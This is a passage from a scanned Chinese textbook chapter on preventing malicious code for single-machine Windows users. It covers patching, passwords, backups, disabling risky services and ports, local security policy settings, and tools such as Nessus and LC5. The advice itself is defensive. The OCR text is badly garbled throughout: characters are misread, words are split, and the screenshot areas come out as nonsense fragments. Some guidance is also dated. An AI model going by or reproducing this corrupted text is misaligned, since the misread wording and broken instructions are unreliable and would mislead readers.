取 措 施 , 从 根本 上 阻 断 恶 意 代码 的 传播 途径 。 

8. 加 强 信息 安全 培训 

恶意 代码 的 技术 和 手段 日 新 月 异 , 因 此 ,急需 建立 一 套 安全 培训 课程 ,提高 技术 人 员 的 
恶意 代码 防范 能 力 。 

9. 加 强 技术 防范 措施 

管理 措施 固然 重要 ,但 是 ,技术 防范 措施 仍然 是 恶意 代码 防治 工作 的 核心 内 容 。 根 据 前 
面 章 节 的 内 容 及 恶意 代码 防治 的 经 验 , 本 草 将 给 出 恶意 代码 的 技术 防范 措施 。 


12.3 单机 用 户 防治 案 略 


网 络 专家 称 :“ 重 要 的 硬件 设施 虽然 非常 重视 杀毒 、 防 黑客 ,但 网 络 真正 的 安全 漏洞 来 
自 于 家 庭 用 户 ,这 些 个体 用 户 人 欠缺 自我 保护 的 知识 ,让 网 络 充满 地 雷 , 进 而 对 其 他 用 户 构 成 
威胁 。” 

尽管 单机 用 户 的 恶意 代码 防治 非常 重要 ,但 相对 于 企业 用 户 而 言 , 单 机 用 户 的 系统 结构 
简单 ,设置 容易 ,并 且 对 安全 的 要 求 相对 较 低 。 单 机 用 户 系统 的 特点 如 下 。 

(1) 只 有 一 台 计 算 机 。 

(2) 上 网 方式 简单 (只 通过 单一 网 卡 与 外 界 进行 数据 交互 )。 

(3) 威胁 相对 较 低 。 

(4) 损失 相对 较 低 。 

由 此 可 见 , 个 人 用 户 的 恶意 代码 防治 工作 相对 简单 。 但 是 ,由 于 大 多 数 单 机 用 户 的 计算 
机 安全 防范 意识 相对 较 差 ,特别 是 恶意 代码 防范 技术 更 是 特别 的 薄弱 ,因此 ,单机 用 户 不 仅 
需要 易于 使 用 的 防范 软件 ,而且 需 要 简单 的 使 用 方法 等 方面 的 培训 。 


12.3.1 一 般 技术 措施 


(1) 新 购置 的 计算 机 ,安装 完成 操作 系统 之 后 ,第 一 时 间 进 行 系统 升级 ,保证 修补 所 有 
已 知 的 安全 漏洞 。 
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(2) 使 用 高 强度 的 口令 ,如 字母 .数字 符合 的 组 合 ， 
同 的 口令 。 

(3) 及 时 安装 系统 补丁 ,安装 杀毒 软件 并 定时 升级 和 全 面 查 杀 。 恶 意 代 码 编制 技术 已 
经 和 黑客 技术 逐步 融合 ,下 载 、 安装 补 本 程序 和 杀毒 软件 升级 将 成 为 防治 恶意 代码 的 有 效 
手段 。 

(4) 重要 数据 应 当 留 有 备份 。 特 别 是 要 做 到 经 常 性 地 对 不 易 复 得 的 数据 (个 人 文档 、 程 
序 源 代 码 等 ) 使 用 光盘 等 介质 进行 完全 备份 。 

(5) 选择 并 安装 经 过 权威 机 构 认 证 的 安全 防范 软件 ,经 党 对 系统 的 核心 部 件 进行 检查 ， 
定期 对 整个 硬盘 进行 检测 。 

(6) 使 用 网 络 防 火 墙 ( 个 人 防火 墙 ) 保 障 系 统 的 安全 性 。 

(7) 当 不 需要 使 用 网 络 时 ,就 不 要 接 人 互联 网 ,或 者 断 开 网 络 连接 。 

(8) 设置 杀毒 软件 的 邮件 自动 杀毒 功能 。 不 要 随意 打开 卫生 人 发 来 的 电子 邮件 ,无论 
它们 有 多 么 诱 人 的 标题 或 附件 。 同 时 也 要 小 心 处 理 来 自 于 熟人 的 邮件 附件 。 

(9) 正确 配置 恶意 代码 防治 产品 ,发挥 产品 的 技术 特点 ,保护 月 身 系 统 的 安全 。 

(10) 充分 利用 系统 提供 的 安全 机 制 ,正确 配置 系统 ,减少 恶意 代码 入 侵 事 件 。 

(11) 定期 检查 敏感 文件 ,保证 及 时 发 现 已 感染 的 恶意 代码 和 黑客 程序 。 


12.3.2 个 人 用 户 上 网 基本 环 略 


网 络 在 给 和 人们 的 工作 和 学 习 带 来 便利 的 同时 也 促进 了 恶意 代码 的 发 展 与 传播 。 考 庸 置 
疑 , 网 络 成 了 恶意 代码 传播 的 最 重要 媒介 。 因 此 ,采用 规范 的 上 网 措施 是 个 人 计算 机 用 户 防 
范 恶 意 代码 侵扰 的 一 个 关键 环节 。 根 据 个 人 用 户 的 上 网 特点 ,在 此 给 出 了 个 人 计算 机 用 户 
上 网 的 基本 策略 。 

(1) 关闭 浏览 器 Cookie 选项 。Cookie 通常 记录 一 些 敏感 信息 ,如 用 户 名 、 计 算 机 名 ,使 
用 的 浏览 需 和 曾经 访问 的 网 站 。 如 果 用 户 不 布 望 这 些 内 容 泄露 出 去 ,尤其 是 当 其 中 还 包含 
有 私人 信息 时 ,可 以 关闭 浏览 侨 的 Cookie 选项 。 禁 用 Cookie 选项 对 绝 大 多 数 网 站 的 访问 
不 会 造成 影响 ,并 且 可 以 有 效 地 防止 私人 信息 的 泄露 。 

(2) 使 用 个 人 防火 墙 。 防 火 墙 的 隐私 设置 功能 允许 用 户 设 置 计算 机 中 的 那些 文件 属于 
保密 信息 ,从 而 避免 这 些 信息 被 发 送 到 不 安全 的 网 络 上 。 防 火 墙 的 恶意 代码 防范 功能 还 可 
以 防止 网 站 服务 需 在 用 户 未 察觉 的 情况 下 跟踪 用 户 的 电子 邮件 地 址 和 其 他 个 人 信息 ,保护 
计算 机 和 个 人 数据 免 遭 黑客 人 侵 。 

(3) 浏览 电子 商务 网 站 时 尽 可 能 使 用 安全 的 连接 方式 。 通 常 浏览 器 会 在 状态 栏 中 使 用 
一 个 锁 形 图 标 表示 当前 连接 是 否 被 加 密 。 在 进行 任何 的 交易 或 发 送信 息 之 前 ,要 阅读 网 站 
的 隐私 保护 政策 ,因为 有 些 网 站 会 将 个 人 信息 出 售 给 第 三 方 。 

(4) 不 透露 关键 信息 。 关 键 信 息 包括 个 人 信息 、 账 号 和 口令 等 。 黑 客 有 时 会 假装 成 ISP 
服务 代表 并 询问 你 的 口令 。 真 正 的 ISP 服务 代表 不 会 问 用 户 的 口令 。 

(5) 避免 使 用 过 于 简单 的 密码 ,尽量 使 用 字母 和 数字 的 组 合并 定期 更 换 密 码 。 

(6) 不 要 随意 打开 电子 邮件 附件 。 特 洛 伊 木马 程序 可 以 伪装 成 其 他 文件 ,潜伏 在 计算 
机 中 使 得 黑客 能 够 访问 用 户 的 文档 ,甚至 控制 用 户 的 设备 。 

(7) 定期 扫 摘 计算 机 并 查找 安全 漏洞 ,提高 计算 机 防护 蠕虫 等 恶意 代码 的 能 力 。 


定期 更 换 。 对 不 同 的 账号 选用 不 
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(8) 使 用 软件 的 稳定 版 本 并 及 时 安装 补丁 程序 。 各 种 软件 的 补丁 程序 往往 用 于 修复 软 
件 的 安全 漏洞 ,及 时 安装 软件 开发 商 提 供 的 补丁 程序 是 十 分 必要 的 。 

(9) 尽量 关闭 不 需要 的 组 件 和 服务 程序 。 默 认 设 置 下 ,系统 往往 会 允许 使 用 很 多 不 必 
要 而 且 很 可 能 暴露 安全 漏洞 的 端口 .服务 和 协议 ,如 文件 及 打印 机 共享 服务 等 。 为 了 确保 安 
全 ,可 以 删除 不 使 用 的 服务 .协议 和 端口 。 

(10) 尽量 使 用 代理 服务 器 上 网 。 代 理 服务 器 作为 一 个 中 间 缓 冲 , 可 以 保证 在 正常 浏览 
任何 站 点 的 同时 ,也 能 隐藏 用 户 的 计算 机 。 


12.4 如 何 建立 安全 的 单机 系统 


任何 单机 用 户 都 想 拥 有 一 个 绝对 安全 的 计算 机 环境 。 可 异 的 是 ,这 只 是 个 理想 目标 。 
本 节 以 Windows 操作 系统 为 例 ,介绍 建立 一 个 安全 的 计算 机 环境 需要 做 的 5 个 方面 的 工 
作 : 打 牢 基础 . 选 好 工具 、 注 意 方法 、 应 急 措施 、 自 我 提高 。 


12.4.1 打 牢 基础 


安全 的 系统 必须 有 一 个 牢固 的 基础 ,这 个 就 像 建筑 领域 的 地 基 一 样 。 计 算 机 系统 的 安 
全 基础 需要 从 便 盘 格式 、 账 号 管理 ,口令 设置 服务 及 端口 配置 ,安全 策略 等 方面 进行 规范 化 
设置 。 

1. 硬盘 格式 

Windows 系统 目前 支持 FAT、FAT32、NTEFS 等 几 种 硬盘 格式 。 其 中 ,NTFS 文件 系统 
有 诸多 的 优秀 特性 ,使 得 管理 计算 机 和 用 户 权 限 、 管 理 磁盘 空间 、 管 理 敏感 数据 的 效率 都 得 
到 了 巨大 的 提升 。 因 此 ,在 没有 特殊 需求 时 ,应 该 把 硬盘 格式 化 为 NTFS 格式 。 

2. 账号 管理 

黑客 或 恶意 代码 通常 特别 关注 Windows 系统 中 默认 的 账号 ,如 Guest 和 Administrator。 
Administrator 作为 管理 员 拥 有 系统 管理 的 所 有 权限 ,而 Guest 只 有 很 少 的 一 部 分 权限 。 当 
黑客 进行 远程 人 侵 时 ,通常 使 用 没有 密码 的 Guest 账号 登录 计算 机 ,然后 设法 通过 某 些 系 统 
漏洞 提升 Guest 账号 的 权限 ,达到 操作 计算 机 的 目的 。 为 了 更 好 地 保护 计算 机 的 安全 ,最 好 
禁用 Guest 账户 。 

对 于 Administrator 账号 也 建议 用 户 停 用 。 当 然 在 停 用 之 前 ,必须 先生 成 一 个 新 的 账 
号 ,如 newadmin, 并 给 予 newadmin 以 管理 员 权 限 。 这 样 就 可 以 把 Administrator 账号 停 挥 
了 。 当 然 , 还 可 以 做 得 更 彻底 一 点 ,直接 删除 系统 默认 的 Administrator 账号 。 

3. 口令 设置 

为 了 防止 黑客 和 恶意 代码 突破 用 户 的 系统 ,还 需要 设置 难度 更 大 的 口令 。 简 单 的 口令 
能 够 轻易 被 暴力 破解 。 因 此 ,建议 用 户 给 自己 的 系统 设置 一 个 复杂 强大 的 口令 ,此 外 ,也 可 
以 使 用 附加 的 口令 加 强 工 具 。 

复杂 的 口令 安全 但 不 宜 记 住 , 这 也 是 大 多 数 用 户 选 择 弱 口令 的 主要 原因 。 信 息 安 全 专 
家 提供 了 很 多 设置 复杂 且 易 于 牢记 口令 的 办 法 ,其 中 最 优秀 的 就 是 用 熟悉 的 谚语 或 歌词 的 
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字母 转换 为 口令 。 例 如 ,北京 欢迎 你 ,五 大 洲 的 朋友 ”, 可 以 转换 为 “bjhynwdzdpy”。 这 个 
口令 对 于 破解 程序 而 言 , 非 党 无 序 且 难以 猜 解 。 如 果 再 使 用 一 些 大 写字 母 , 就 更 加 安 
< 

SAM 数据 破解 是 黑客 突破 系统 的 另 一 个 手段 ,为 了 防止 黑客 通过 SAM 获得 口令 ,可 
以 使 用 Syskey 进行 加 固 。 用 过 去 的 加 密 机 制 , 攻 击 者 只 需 取 得 一 份 加 密 的 SAM 库 的 复 
制 ,使 用 专门 的 软件 破解 用 户口 令 。Syskey 是 Windows 系统 自 带 的 一 个 工具 ,可 以 用 来 保 
护 SAM 数据 库 不 被 离线 破解 。Syskey 对 数据 库 采 用 了 更 多 的 加 密 措 施 , 目 的 是 增加 破解 
的 计算 量 ,使 又 力 破解 从 时 间 上 考虑 不 可 行 。 使 用 Windows 的 日 动 更 新 即 可 和 安 小 Syskey 
功能 。 

4. 服务 及 端口 配置 


初次 安装 操作 系统 后 ,系统 会 默认 开启 的 很 多 不 必要 的 服务 。 这 些 多 余 的 不 必要 的 服 
务 会 给 系统 市 来 一 定 的 安全 隐患 ,所 以 应 该 根据 用 户 的 实际 需求 ,把 多 余 的 服务 关闭 。 

系统 默认 开局 的 多 余 端口 ,会 为 蠕虫 .木马 等 恶意 代码 及 黑客 提供 入 侵 途 径 。 因 此 ,也 
建议 关闭 多 余 的 端口 。 

Windows 系统 中 多 余 的 服务 列举 如 下 。 

(1) Messenger 服务 : 即 信使 服务 ,这 是 一 个 非常 危险 的 服务 。 该 服务 可 以 帮助 计算 机 
用 户 在 局 域 网 内 交换 资料 , 它 主要 用 在 企业 的 网 络 管理 方面 ,但 是 垃圾 邮件 和 垃圾 广告 厂商 
也 经 常 利用 该 服务 发 布 弹出 式 广告 。 这 项 服务 曾经 有 威胁 汤 洞 , MSBlast 和 Slammer 可 以 
用 它 进行 传播 。 

(2) Terminal Services 服务 : 即 远 程控 制服 务 ,允许 多 位 用 户 连接 并 控制 一 台 机 需 , 并 
昌 在 远程 计算 机 上 显示 有 困 面 和 应 用 程序 。 如 果 不 使 用 Windows 的 远程 控制 功能 ,建议 禁 
人 

(3) Remote Registry 服务 : 使 远程 用 户 能 修改 此 计算 机 上 的 注册 表 。 注 册 表 是 系统 的 
核心 内 容 ,一 般 不 建议 用 户 自 行 更 改 , 更 何况 要 让 他 人 远程 修改 ,所 以 这 项 服务 是 极其 危 
险 的 。 

(4) Telnet 服务 : 允许 远程 用 户 登 录 到 此 计算 机 并 运行 程序 , 文 持 多 种 TCP/IP Telnet 
客户 ,包括 基于 UNIX 和 Windows 的 计算 机 。 如 果 启 动 该 服务 ,远程 用 户 就 可 以 登录 ,访问 
本 地 的 程序 ,甚至 可 以 用 它 来 修改 ADSL Modem 等 网 络 设置 。 这 是 一 个 危险 的 服务 ,建议 
用 户 一 定 要 禁止 该 服务 。 

(5) Performance Logs And Alerts 服务 : 收集 本 地 或 远程 计算 机 基于 预先 配置 的 日 程 
参数 的 性 能 数据 ,然后 将 此 数据 写 入 日 志 或 触发 和 警报。 为 了 防止 被 远程 计算 机 搜索 数据 , 建 
议 禁 止 该 服务 。 

(6) Remote Desktop Help Session Manager 服务 : 远程 果 面 协助 服务 ,用 于 管理 和 控 
制 远 程 协 助 。 该 服务 对 普通 用 户 用 处 不 大 ,可 以 关闭 。 如 果 此 服务 被 终止 ,远程 协助 将 不 可 
使 用 。 

(7) TCP/IP NetBIOS Helper 服务 : NetBIOS 在 Windows 9X 下 就 经 常 被 用 来 进行 攻 
击 , 对 于 不 需要 文件 和 打印 共享 的 用 户 , 可 以 禁用 此 服务 。 

(8) Fast User Switching Compatibility 服务 : 在 多 用 户 下 为 需要 协助 的 应 用 程序 提供 
管理 。 通 过 该 服务 ,Windows XP 允许 在 一 台 计 算 机 上 进行 多 用 户 之 间 的 快速 切换 ,但 是 这 
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项 功能 曾经 有 漏洞 。 如 果 不 经 常 使 用 ,可 以 禁止 该 服务 。 

(9) NetMeeting Remote Desktop Sharing 服务 : 允许 受权 的 用 户 通 过 NetMeeting 在 
网 络 上 互相 访问 对 方 。 这 项 服务 对 大 多 数 个 人 用 户 并 没有 多 大 用 处 ,并 且 会 带 来 安全 问题 。 
上 网 时 该 服务 会 把 用 户 名 以 明文 形式 发 送 到 连接 它 的 客户 端 , 噢 探 程 序 很 容易 就 能 探测 到 
这 些 账 户 信息 。 

(10) Universal Plug and Play Device Host 服务 : 为 即 插 即 用 设备 提供 支持 。 该 服务 
存在 一 个 安全 漏洞 ,运行 此 服务 的 计算 机 很 容易 受到 攻击 。 攻 击 者 只 要 回 某 个 拥有 多 人 台 
Windows XP 系统 的 网 络 发 送 一 个 虚假 的 UDP 包 , 就 可 能 会 造成 这 些 主机 对 指定 的 主机 进 
行 DDOS 攻击 。 

Windows 默认 且 必 须 关 闭 的 端口 往往 是 系统 的 服务 开放 的 ,如 果 关 闭 了 相应 的 服务 ， 
其 对 应 的 端口 也 就 关闭 了 。Windows 系统 比较 危险 的 端口 如 下 。 

21 端口 : 主要 用 于 FTP 服务 。 如 果 不 架 设 FTP 服务 天 ,建议 关闭 21 端口 。 

23 端口 : 主要 用 于 Telnet 服务 ,也 是 TTS 木马 的 默认 端口 ,因此 建议 关闭 它 。 

25 端口 : 该 端口 为 SMTP 服务 开放 的 端口 ,如果 不 是 要 架设 SMTP 邮件 服务 器 ,可 以 
将 该 端口 关闭 。 

53 端口 : 该 端口 为 DNS 服务 器 所 开放 ,主要 用 于 域名 解析 ,如 果 当 前 的 计算 机 不 是 用 
于 提供 域名 解析 服务 ,建议 关闭 该 端口 。 

123 端口 : 是 Windows Time 服务 开放 的 端口 ,该 端口 可 以 被 某 些 蠕 虫 利 用 ,建议 禁 
用 它 。 
135 端口 : 主要 用 于 使 用 RPC 协议 并 提供 DCOM (分 布 式 组 件 对 象 模 型 ) 服 务 ,通过 
RPC 可 以 保证 在 一 台 计 算 机 上 运行 的 程序 可 以 顺利 地 执行 远程 计算 机 上 的 代码 。 这 也 是 
蠕虫 常用 的 端口 ,强烈 建议 关闭 。 

137、138 端口 : 这 两 个 是 UDP 端口 , 当 通 过 网 上 邻居 传输 文件 时 用 这 个 端口 。 对 于 攻 
击 者 来 说 ,通过 发 送 请 求 很 容易 就 获取 目标 计算 机 的 相关 信息 ,有 些 信息 可 以 被 用 来 分 析 漏 
洞 。 另 外 ,通过 捕获 正在 利用 137 端口 进行 通信 的 信息 包 , 还 可 能 得 到 目标 计算 机 的 启动 和 
关闭 的 时 间 ,这 样 就 可 以 利用 专门 的 工具 来 攻击 。 

139 端口 : 是 为 NetBIOS Session Service 服务 开放 的 端口 ,主要 用 于 提供 Windows 文 
件 和 打印 机 共享 及 UNIX 中 的 Samba 服务 。Windows 系统 要 在 局 域 网 中 进行 文件 的 共 
享 ,必须 使 用 该 服务 。 开 启 139 端口 虽然 可 以 提供 共享 服务 ,但 是 常常 被 攻击 者 用 来 进 
行 攻击 。 黑 客 利用 专门 的 扫描 工具 扫描 目标 计算 机 的 139 端口 ,如 果 发 现 有 漏洞 ,可 以 
尝试 获取 用 户 名 和 口令 ,这 是 非常 危险 的 。 如 果 不 需 要 提供 文件 和 打印 机 共享 ,建议 关 
闭 该 端口 。 

445 端口 : 这 是 关于 文件 和 打印 共享 的 端口 ,也 是 比较 容易 受 攻击 的 端口 。 如 果 不 使 
用 共享 服务 ,可 以 将 其 关闭 。 

1900 端口 : SSDP Discovery Service 服务 开放 的 端口 。 关 闭 这 个 端口 ,可 以 防范 DDOS 
攻击 。 

3389 端口 : 这 是 Windows 的 远程 管理 终端 所 开 的 端口 , 它 并 不 是 一 个 木马 程序 ,请 先 
确定 该 服务 是 否 是 目 己 开放 的 。 如 果 不 是 必需 的 ,请 关闭 该 服务 。 
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5. 使 用 本 地 安全 策略 


Windows 系统 日 市 的 “本 地 安全 策略 ”是 一 个 很 不 错 的 系统 安全 管理 工具 。 这 个 工具 
涵盖 的 内 容 非 常 多 ,通过 这 个 工具 可 以 管理 账号 口令、 权限 ,审核 等 内 容 。 下 面 简单 介绍 本 
地 安全 策略 中 的 账号 策略 和 口令 策略 。 本 地 安全 宁 略 位 于 控制 面板 的 管理 工具 中 。 

1) 账号 管理 

为 了 防止 人 侵 者 利用 漏洞 登录 计算 机 ,要 在 此 设置 重 命名 系统 管理 员 账 户 名 称 及 禁用 
来 宾 账 户 。 设 置 方 法 为 : 在 “本 地 策略 ”一 “安全 选项 ?下 选中 "账户 : 来 宾 账 户 状 态 ” 策 上 略 并 
右 击 ,在 弹出 的 快捷 菜单 中 选择 “属性 ”选项 ,而 后 在 弹出 的 属性 对 话 框 中 选中 “已 停 用 ” 单 选 
按钮 ,最 后 单 击 “ 确 定 ” 按 钮 退出 ,如 图 12-1 所 示 。 

大 本 地 安全 策略 一 口 
文件 (F) ”操作 (A) ”查看 (V) ”帮助 (H) 
和 和 中 由 国光 国 同日 国 


帐户 : 来 宾 帐 户 状态 屋 性 


和 


”本 地 安全 设置 ”说明 
安全 选项 , 
; 国 高 级 安全 Windows Defender 防火 墙 池 帐户 : 来 宾 帐 户 状态 
局 网 络 列表 管理 器 策略 
， 辐 公 钥 策略 
， 国 软件 限制 策略 


O 已 启用 (日 
国 已 禁用 (9) 


了 了 了 了 了 了 了 了 了 了 


”回应 用 程序 控制 策略 
， 锅 IP 安全 策略 ， 在 本 地 计算 机 
审核 策略 配置 


， 国 | 高 级 
网 域 控制 器 : LDAP 服务 器 签名 要 求 
部 域 控制 器 : 拒绝 计算 机 帐户 密码 更 改 
训 域 控制 器 : 允许 服务 器 操作 者 计划 任务 
加 帐户 : 管理 员 帐户 状态 
国 帐户 : 来 宾 帐户 状态 
加 帐户 : 使 用 空 密码 的 本 地 帐户 只 允许 进行 控制 台 登 录 
训 帐户 : 重 命名 来 宾 帐户 
品 帐户 : 重 命名 系统 管理 员 帐 户 
国 帐户 : 阻止 Microsoft 帐户 


12-1 来 宾 账 号 管理 


2) 禁止 枚 举 账 号 

某 些 具有 黑客 行为 的 蠕虫 病毒 ,可 以 通过 扫描 Windows 系统 的 指定 端口 ,然后 通过 共 
享 会 话 猜测 管理 员 系 统 口令 。 因 此 ,用 户 需要 在 “本 地 安全 策略 ?中 设置 禁止 枚 举 账 号 ,从 而 
抵御 此 类 入 侵 行 为 ,操作 步骤 如 下 。 

在 “本 地 安全 策略 ”界面 左 侧 列表 的 “安全 设置 "目录 树 中 , 逐 层 展开 “本 地 策略 ”一 “安全 
选项 ?选项 。 查 看 右 侧 的 相关 策略 列表 ,选中 "网 络 访问 : 不 允许 SAM 账户 和 共享 的 匿名 枚 
举 ? 选 项 并 右 击 ,在 弹出 的 快捷 菜单 中 选择 “属性 ”选项 ,而 后 会 弹出 一 个 对 话 框 ,在 此 选中 
“已 启 用 ” 单 选 按钮 ,最 后 单 击 “ 应 用 ”按钮 使 设置 生效 ,如 图 12-2 所 示 。 

3) 口令 策略 

在 “安全 设置 ?中 , 先 定位 于 "账户 策略 ”密码 策略 ?选项 ,在 其 右 侧 设置 视图 中 ,可 进 
行 相应 的 设置 ,以 使 用 户 的 系统 密码 相对 安全 , 且 不 易 破 解 。 如 防 破解 的 一 个 重要 手段 就 是 
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叱 本 地 安全 策略 一 口 X 
文件 (F) ”操作 (A) ”查看 (V) ”帮助 (H) 
和 和 中 出国 兴国 已 
取 安全 设置 策略 安全 设置 ^ 
， -1 re 加 网 络 访问 : 不 允许 SAM 帐户 的 匿名 枚 举 已 启用 
， 避 审核 策略 图 网 络 访问 : 不 允许 SAM 帐户 和 共享 的 匿名 枚 举 已 禁用 
， 芍 用 户 权限 分 配 吕 网 络 访 问 : 不 允许 SAM 帐户 和 共享 的 医 名 枚 举 屋 性 7 x 
”总 安 全 选项 
国 高 级 安全 Windows Defender 防火 墙 | 国 ”本 地 安全 设置 说明 
习 网 络 列表 管理 器 策略 
习 公 钥 策略 ， 网 络 访问 : 不 允许 SAM 帐户 和 共享 的 匿名 枚 举 
习 软件 限制 策略 3 
入 Ip 安全 策略 ， 在 本 地 计算 机 
国 高 级 审核 策略 配置 
O 已 启用 (日 
@ 已 禁用 (5) 
访 。 售 改 此 设置 可 能 影响 与 客户 端 、 服 务 和 应 用 程序 的 闲 容 性 . 
有 关 详 细 信 息 ， 请 参阅 网 络 访问 |: 不 人 i 


。 (Q823659) 


图 12-2 ”禁止 枚 举 账号 
定期 更 新 密码 ,可 据 此 进行 如 下 设置 : 右 击 “密码 最 长 使 用 期 限 ”, 在 弹出 的 快捷 沫 单 中 选择 
“属性 ?选项 ,在 弹出 的 对 话 框 中 ,读者 可 有 目 定 义 一 个 密码 设置 后 能 够 使 用 的 时 间 长 得。 如 果 
超过 该 时 间 ,该 口令 对 应 的 账号 将 被 禁止 ,如 图 12-3 所 示 。 
起 本 地 安全 策略 


文件 (F) ”操作 (A) ”查看 (V) ”帮助 (H) 
和 和 中 和 册 国 闪 忆 上 日 隔 


器 网 络 列表 管理 器 策略 
， 国 公 钥 策略 


， 国 软件 限制 策略 


， 国 应 用 程序 控制 策略 
， 电 IpP 安全 策略 ， 在 本 地 计算 机 
， 国 高 级 审核 策略 配置 


12-3 口令 策略 设置 


完成 上 述 5 个 步骤 ,用 户 的 系统 已 经 具有 了 一 个 非常 牢固 的 基础 。 当 然 , 是 否 牢固 不 能 
空 口 无 任 。 在 此 ,给 用 户 推荐 几 个 评 佑 系统 安全 性 的 工具 ,如 脆弱 性 分 析 工 具 、` 漏 洞 扫描 工 
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具 ,口令 破解 工具 等 。 如 果 这 几 个 工具 都 认为 系统 是 安全 的 ,那么 系统 就 是 安全 的 。 

(1) 脆弱 性 分 析 工 具 。 脆 弱 性 分 析 工 具 主要 用 于 分 析 系 统 的 脆弱 性 ,当然 ,也 可 用 于 评 
佑 重要 应 用 程序 (如 Office 套件 ) 的 脆弱 性 。 该 类 工具 被 运行 后 ,会 给 用 户 一 个 评 佑 报告 ， 
如 系统 的 账号 是 否 安 全 ,口令 是 否 安全 、 系 统 和 重要 应 用 是 否 及 时 打 补 丁 等 。 微 软 为 日 己 的 
操作 系统 开发 了 一 个 著名 的 脆弱 性 分 析 工 具 , 即 Microsoft Baseline Security Analyzer 
(MBSA) 。Microsoft Baseline Security Analyzer 的 分 析 内 容 主 要 包括 系统 管理 权限 脆弱 性 
分 析 、 弱 口令 分 析 IIS 服务 器 脆弱 性 分 析 、SQL Server 管理 员 脆 弱 性 分 析 、 系 统 更 细 配 置 分 
析 、 防 火 墙 及 杀毒 软件 脆弱 性 分 析 等 。 

(2) 漏洞 扫 摘 工具。 洗 洞 扫 摘 工具 稼 被 向 称 为 Scan, 是 攻防 双方 必 备 的 工具 。 黑 客 用 
它 发 现 目标 危 辽 端口 .系统 漏洞 等 ,并 根据 扫 摘 结果 判断 和 人 侵 难 度 , 选 择 合适 的 入 侵 工 具 。 
安全 防护 人 员 人 借助 这 个 工具 可 以 先 于 黑客 发 现 这 些 危 险 端 口 和 漏洞 ,事先 把 漏洞 堵 住 ,把 端 
口 关闭 ,不 给 黑客 可 乘 之 机 。 

比较 著名 的 漏洞 扫描 工具 为 Nessus。 该 工具 一 直 以 漏洞 库 齐 全 扫描 速度 快 、 结 果 准 

(3) 口令 破解 工具 。 口令 破解 是 专门 用 来 破解 系统 口令 的 工具 ,同样 也 是 攻防 双方 必 
备 的 工具 。 安 全 防护 人 员 通 过 该 工具 可 以 验证 日 己 的 口令 是 否 安全 可 徘 。 

著名 的 口令 破解 工具 为 LC5。LC5 既 可 直接 读 取 系统 的 SAM 文件 ,也 可 以 在 网 络 上 
串 探 用 户 的 口令 。 其 主要 采用 穷 举 法 进行 口令 破解 ,只 要 时 间 人 允许, 可 以 破译 所 有 的 口令 。 
实验 测试 可 知 , 用 LC5 破解 6 位 纯 数 字 的 口令 ,通常 只 需 20 分 钟 。 


12.4.2 选 好 工具 


在 牢固 地 基 的 基础 上 ,还 要 为 用 户 的 系统 选择 合适 的 恶意 代码 防范 工具 。 恶 意 代 码 是 
防不胜防 的 ,好 的 工具 可 以 为 系统 提供 优质 的 服务 。 因 此 ,读者 需要 为 自己 的 系统 选择 合适 
的 杀毒 软件 .杀毒 软件 搭档 补丁 管理 和 升级 工具 个 人 防火 墙 \ 木 马 专 杀 工 具 等 。 

1. 杀毒 软件 

11. 3. 1 节 介 绍 了 选择 杀毒 软件 的 标准 ,11. 3. 2 节 介 绍 了 一 些 商 用 杀毒 软件 的 名 称 , 并 引 
用 了 第 三 方 机 构 关 于 一 些 杀 毒 软件 的 评价 。 用 户 可 以 参考 上 述 内 容 选择 自己 喜欢 的 杀毒 软件 。 

2. 杀毒 软件 的 搭档 

实践 已 经 证 明 ,仅仅 依赖 杀毒 软件 已 经 不 能 防范 日 益 强 大 的 恶意 代码 了 。 因 此 ,需要 给 
杀毒 软件 配备 一 个 搭档 。 依 助 这 类 搭档 ,用 户 能 够 方便 地 查看 系统 的 局 动 项 和 服务 运行 ,能 
够 方便 地 清理 系统 垃圾 .设置 IE 等 应 用 程序 的 选项 。 例 如 ,魔法 兔子 .优化 程序 .360 安全 
卫士 等 就 是 这 类 程序 的 典型 代表 。 其 中 ,作者 推荐 360 安全 卫士 作为 杀毒 软件 的 最 佳 搭档 。 
360 的 功能 非常 强大 ,除了 具有 优化 功能 外 ,还 能 管理 补丁 、 软 件 升级 及 木马 查 杀 等 。 

3. 补丁 管理 和 升级 工具 

大 型 软件 是 个 复杂 的 系统 ,Bug 不 可 避免 ,因此 ,操作 系统 、 大 型 应 用 程序 都 存在 大 量 的 
漏洞 。 为 了 弥补 过 失 ,软件 生产 厂商 会 发 布 补丁 。 尽 管 操 作 系 统 本 和 号 会 附带 自动 升级 功能 ， 
第 三 方 软件 提供 的 补丁 管理 和 升级 功能 往往 更 加 人 性 化 。360 安全 卫士 是 非常 好 的 第 三 方 
补丁 管理 和 升级 工具 。360 卫士 可 以 自动 检测 用 户 系 统 的 漏洞 ,自动 下 载 并 安装 补丁 。 记 
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今 为 止 ,360 安全 卫士 可 以 管理 操作 系统 、Office 套件 、Realplay、Adobe 等 大 型 软件 的 补丁 ， 
并 指导 用 户 升级 。 

4. 个 人 防火 墙 

补丁 管理 和 升级 帮助 用 户 封 堵 了 蠕虫 这 类 恶意 代码 ,个 人 防火 墙 则 是 用 户 对 付 特 洛 伊 
木马 这 类 恶意 代码 的 必要 装备 。 作 者 推荐 使 用 Windows 日 市 的 个 人 防火 墙 。 

5. 木马 专 杀 工 具 

2005 年 后 ,特洛伊 木马 取代 蠕虫 成 为 了 恶意 代码 的 主力 ,因此 ,防范 木马 成 为 当前 恶意 
代码 防范 工作 的 重点 。 用 户 可 以 在 使 用 防 病毒 软件 的 基础 上 ,选择 一 球 木 马 专 杀 工 具 来 专 
门 对 付 特洛伊 木马 。 


12.4.3 注意 方法 


“三 分 技术 ,七 分 管理 ?是 当前 信息 安全 防范 工作 的 真实 写照 。 为 了 使 用 户 的 计算 机 系 
统 更 加 安全 ,同样 需要 在 技术 装备 的 基础 上 ,注意 对 这 些 技 术 的 使 用 和 配置 方法 。 民 好 的 习 
惯 、 正 确 的 配置 和 使 用 方法 能 够 使 用 户 安 痛 的 工具 达到 最 大 防范 效果 。 


12.4.4 应 急 措 施 


随 着 信息 技术 的 发 展 ,信息 资源 管理 将 被 作为 国家 战略 来 推进 ,企业 竞争 的 焦点 也 将 落 
在 对 信息 资源 的 开发 利用 上 。 ”三 分 技术 .七 分 管理 .十 二 分 数据 ”的 说 法 成 为 现代 企业 信息 
化 管理 的 标志 性 注释 。 信 息 资 源 已 经 成 为 继 土 地 和 资本 之 后 最 重要 的 财富 来 源 。 同 样 ,对 
于 个 人 用 户 来 说 ,个 人 创作 的 数据 也 是 弥 足 珍 贯 的 。 因 此 ,只 有 考虑 了 数据 备份 和 恢复 功能 
